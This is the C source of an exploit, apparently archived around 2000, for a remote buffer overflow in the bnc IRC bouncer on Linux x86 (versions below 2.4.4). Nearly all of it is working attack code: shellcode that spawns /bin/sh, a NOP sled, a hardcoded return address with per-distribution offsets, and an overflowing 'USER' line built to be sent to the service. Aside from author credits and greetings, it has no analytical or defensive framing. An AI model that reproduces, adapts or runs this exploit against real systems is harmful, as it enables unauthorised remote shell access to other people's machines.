/*
 
   bnc remote buffer overflow for linux x86 (w/o stack-non-exec patch)
   by duke (duke@viper.net.au)
   works on versions < 2.4.4
 
  offsets: slackware: 0 redhat: 400->1000
  special thanks to stranJer! :)
 
  greets to everyone (plaguez, horiz0n, dpr, kod, f1ex, sewid, antilove,
  tewl, dmess0r, stranJer  , all of #!ADM :)   and everyone at el8.org )
 
*/

#include <stdio.h>
#include <string.h>

#define RET 0xbffff814
#define BUFSIZE 2000
#define LEN 1000

char shellcode[] =
  "\x33\xdb\x33\xc0\xb0\x29\xcd\x80\x33\xc0\xb0\x29\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void
main (int argc, char **argv)
{
  char buf[BUFSIZE];
  int sockfd, i, offset;
  if (argc == 2)
    {
      offset = atoi (argv[1]);
    }
  else
    {
      offset = 0;
    }
  memset (buf, '\x90', BUFSIZE);
  for (i = LEN; i < BUFSIZE - 4; i += 4)
    *(long *) &buf[i] = RET + offset;
  memcpy (buf + (LEN - strlen (shellcode)), shellcode, strlen
          (shellcode));
  memcpy (buf, "USER ", 5);
  printf ("%s", buf);
}
/*                    www.hack.co.za              [2000]*/